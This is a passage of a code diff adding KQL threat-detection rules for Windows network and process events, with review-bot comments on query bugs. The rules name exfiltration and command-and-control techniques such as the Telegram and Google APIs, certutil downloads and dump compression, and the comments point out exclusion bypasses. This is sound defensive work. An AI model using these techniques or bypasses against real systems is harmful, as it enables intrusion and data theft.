contains "\\Dropbox")) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql b/KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql new file mode 100644 index 00000000..4fe0bd62 --- /dev/null +++ b/KQL/rules/windows/network_connection/suspicious_network_connection_binary_no_commandline.kql 
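Review bot: `RemotePort in~ ("80", "443")` uses a case-insensitive string operator against the numeric `RemotePort` column; write it as `RemotePort in (80, 443)` as the numeric comparisons elsewhere in this batch do. The rule also carries no false-positives section, and MSBuild legitimately restores NuGet packages over 443 on build hosts, so a line saying the rule should be baselined or scoped to non-build machines before running at high severity would save the first triage round.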
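Review bot: The exclusion `not(InitiatingProcessFolderPath contains "\\Dropbox")` on the `| where` line matches the substring anywhere in the path, so a payload dropped into `%USERPROFILE%\Dropbox\` or any attacker-created `Dropbox` folder is allow-listed while talking to the very API the rule flags. Anchor it to the client's install locations, e.g. `InitiatingProcessFolderPath contains "\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Dropbox\\"`, pair it with `InitiatingProcessFolderPath endswith "\\Dropbox.exe"`, and note the residual bypass in the false-positives comment.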
@@ -0,0 +1,10 @@ +// Title: Suspicious Network Connection Binary No CommandLine +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceNetworkEvents +| where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql b/KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql new file mode 100644 index 00000000..8af365a5 --- /dev/null +++ b/KQL/rules/windows/network_connection/suspicious_network_connection_to_ip_lookup_service_apis.kql 
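Review bot: `InitiatingProcessCommandLine endswith "\\rundll32.exe"` (and the regsvr32/dllhost twins) assumes the recorded command line is the full image path, which is what Sysmon logs; if MDE records only the bare image name for an argument-less launch (`rundll32.exe`), which I believe it commonly does, none of these terms match and the rule is silent. Consider `InitiatingProcessCommandLine in~ ("rundll32.exe", "regsvr32.exe", "dllhost.exe") or InitiatingProcessCommandLine endswith "\\rundll32.exe" ...`, and say in the header comment which form was validated against real telemetry. The `not(InitiatingProcessCommandLine =~ "" or isnull(...))` exclusion is redundant, since an empty command line cannot end with `\\rundll32.exe`.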
@@ -0,0 +1,12 @@ +// Title: Suspicious Network Connection to IP Lookup Service APIs +// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-24 +// Level: medium +// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Legitimate use of the external websites for troubleshooting or network monitoring + +DeviceNetworkEvents +| where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains 
"myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql new file mode 100644 index 00000000..bc7155c4 --- /dev/null +++ b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_google_api.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Non-Browser Network Communication With Google API +// Author: Gavin Knapp +// Date: 2023-05-01 +// Level: medium +// Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning. + +DeviceNetworkEvents +| where (RemoteUrl contains "drive.googleapis.com" or RemoteUrl contains "oauth2.googleapis.com" or RemoteUrl contains "sheets.googleapis.com" or RemoteUrl contains "www.googleapis.com") and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft\\EdgeCore\\") and (InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith 
":\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") or (InitiatingProcessFolderPath contains ":\\Program Files\\Google\\Drive File Stream\\" and InitiatingProcessFolderPath endswith "\\GoogleDriveFS.exe") or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Internet Explorer\\iexplore.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Internet Explorer\\iexplore.exe") or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql new file mode 100644 index 00000000..9fbe84a1 --- /dev/null +++ b/KQL/rules/windows/network_connection/suspicious_non_browser_network_communication_with_telegram_api.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Non-Browser Network Communication With Telegram API +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-19 +// Level: medium +// Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.exfiltration, attack.t1102, attack.t1567, attack.t1105 +// False Positives: +// - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc. + +DeviceNetworkEvents +| where RemoteUrl contains "api.telegram.org" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath 
endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql b/KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql new file mode 100644 index 00000000..c2d29199 --- /dev/null +++ b/KQL/rules/windows/network_connection/suspicious_outbound_smtp_connections.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Outbound SMTP Connections +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. +// The data may also be sent to an alternate network location from the main command and control server. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003 +// False Positives: +// - Other SMTP tools + +DeviceNetworkEvents +| where (RemotePort in~ ("25", "587", "465", "2525")) and (not(((InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\" or (InitiatingProcessFolderPath endswith "\\HxTsr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_")))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql b/KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql new file mode 100644 index 00000000..6cffef56 --- /dev/null +++ b/KQL/rules/windows/network_connection/suspicious_wordpad_outbound_connections.kql 
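Review bot: `RemotePort in~ ("25", "587", "465", "2525")` compares the numeric `RemotePort` column with a case-insensitive string operator; use `RemotePort in (25, 587, 465, 2525)` so the query type-checks and matches the numeric comparisons used elsewhere in the batch. The Outlook and Thunderbird exclusions are also bare file names, so an exfil tool named `outlook.exe` in a temp directory passes; pin them to `\\Microsoft Office\\` and `\\Mozilla Thunderbird\\` paths the way the Exchange and HxTsr entries already are.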
@@ -0,0 +1,13 @@ +// Title: Suspicious Wordpad Outbound Connections +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-12 +// Level: medium +// Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. +// This might indicate potential process injection activity from a beacon or similar mechanisms. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control +// False Positives: +// - Other ports can be used, apply additional filters accordingly + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\wordpad.exe" and (not((RemotePort in~ ("80", "139", "443", "445", "465", "587", "993", "995")))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql new file mode 100644 index 00000000..fa897cb6 --- /dev/null +++ b/KQL/rules/windows/network_connection/uncommon_connection_to_active_directory_web_services.kql 
@@ -0,0 +1,12 @@ +// Title: Uncommon Connection to Active Directory Web Services +// Author: @kostastsale +// Date: 2024-01-26 +// Level: medium +// Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087 +// False Positives: +// - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives. + +DeviceNetworkEvents +| where RemotePort == 9389 and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Microsoft Monitoring Agent\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.ex" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\WindowsPowerShell\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\WindowsPowerShell\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql new file mode 100644 index 00000000..2b12190b --- /dev/null +++ b/KQL/rules/windows/network_connection/uncommon_network_connection_initiated_by_certutil_exe.kql 
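Review bot: `InitiatingProcessFolderPath =~ "C:\\Program Files\\Microsoft Monitoring Agent\\"` is an exact (case-insensitive) equality against a directory, but the column holds full executable paths, so this exclusion can never match and every Monitoring Agent connection to port 9389 will alert. The neighbouring directory exclusions in the same `not(...)` use a prefix match, and this one should too: `InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Monitoring Agent\\"`. This looks like a trailing-backslash value being mapped to equality rather than `startswith`, so the root cause is presumably upstream of this generated file.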
@@ -0,0 +1,11 @@ +// Title: Uncommon Network Connection Initiated By Certutil.EXE +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects a network connection initiated by the certutil.exe utility. +// Attackers can abuse the utility in order to download malware or additional payloads. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents +| where (RemotePort in~ ("80", "135", "443", "445")) and InitiatingProcessFolderPath endswith "\\certutil.exe" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql b/KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql new file mode 100644 index 00000000..a462c4d5 --- /dev/null +++ b/KQL/rules/windows/network_connection/uncommon_outbound_kerberos_connection.kql 
@@ -0,0 +1,12 @@ +// Title: Uncommon Outbound Kerberos Connection +// Author: Ilyas Ochkov, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Web Browsers and third party application might generate similar activity. An initial baseline is required. + +DeviceNetworkEvents +| where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql b/KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql new file mode 100644 index 00000000..97b1da0f --- /dev/null +++ b/KQL/rules/windows/process_creation/7zip_compressing_dump_files.kql 
@@ -0,0 +1,13 @@ +// Title: 7Zip Compressing Dump Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: medium +// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally +// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting + +DeviceProcessEvents +| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql b/KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql new file mode 100644 index 00000000..2c8d2c8b --- /dev/null +++ b/KQL/rules/windows/process_creation/aadinternals_powershell_cmdlets_execution_proccesscreation.kql 
@@ -0,0 +1,12 @@ +// Title: AADInternals PowerShell Cmdlets Execution - ProccessCreation +// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2022-12-23 +// Level: high +// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential-access, attack.impact +// False Positives: +// - Legitimate use of the library for administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Find-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Initialize-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Reset-AADInt" or ProcessCommandLine contains "Resolve-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Save-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Unprotect-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or 
FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql b/KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql new file mode 100644 index 00000000..c2418e3b --- /dev/null +++ b/KQL/rules/windows/process_creation/abuse_of_service_permissions_to_hide_services_via_set_service.kql @@ -0,0 +1,12 @@ +// Title: Abuse of Service Permissions to Hide Services Via Set-Service +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-17 +// Level: high +// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 +// False Positives: +// - Rare intended use of hidden services + +DeviceProcessEvents +| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql b/KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql new file mode 100644 index 00000000..b20ff3c4 --- /dev/null +++ b/KQL/rules/windows/process_creation/abused_debug_privilege_by_arbitrary_parent_processes.kql 
@@ -0,0 +1,10 @@ +// Title: Abused Debug Privilege by Arbitrary Parent Processes +// Author: Semanur Guneysu @semanurtg, oscd.community +// Date: 2020-10-28 +// Level: high +// Description: Detection of unusual child processes by different system processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 + +DeviceProcessEvents +| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD "))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/abusing_print_executable.kql b/KQL/rules/windows/process_creation/abusing_print_executable.kql new file mode 100644 index 00000000..c6fb01db --- /dev/null +++ b/KQL/rules/windows/process_creation/abusing_print_executable.kql 
@@ -0,0 +1,10 @@ +// Title: Abusing Print Executable +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative +// Date: 2020-10-05 +// Level: medium +// Description: Attackers can use print.exe for remote file copy +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql new file mode 100644 index 00000000..f408fd67 --- /dev/null +++ b/KQL/rules/windows/process_creation/active_directory_database_snapshot_via_adexplorer.kql 
@@ -0,0 +1,10 @@ +// Title: Active Directory Database Snapshot Via ADExplorer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482 + +DeviceProcessEvents +| where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql b/KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql new file mode 100644 index 00000000..760ddca2 --- /dev/null +++ b/KQL/rules/windows/process_creation/active_directory_structure_export_via_csvde_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Active Directory Structure Export Via Csvde.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1087.002 + +DeviceProcessEvents +| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql b/KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql new file mode 100644 index 00000000..7867876f --- /dev/null +++ b/KQL/rules/windows/process_creation/active_directory_structure_export_via_ldifde_exe.kql @@ -0,0 +1,10 @@ +// Title: Active Directory Structure Export Via Ldifde.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-14 +// Level: medium +// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration + +DeviceProcessEvents +| where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql new file mode 100644 index 00000000..e6f05bb3 --- /dev/null +++ b/KQL/rules/windows/process_creation/add_insecure_download_source_to_winget.kql 
@@ -0,0 +1,13 @@ +// Title: Add Insecure Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects usage of winget to add a new insecure (http) download source. +// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positives might occur if the users are unaware of such control checks + +DeviceProcessEvents +| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql b/KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql new file mode 100644 index 00000000..e2f2f08a --- /dev/null +++ b/KQL/rules/windows/process_creation/add_new_download_source_to_winget.kql @@ -0,0 +1,12 @@ +// Title: Add New Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: medium +// Description: Detects usage of winget to add new additional download sources +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, 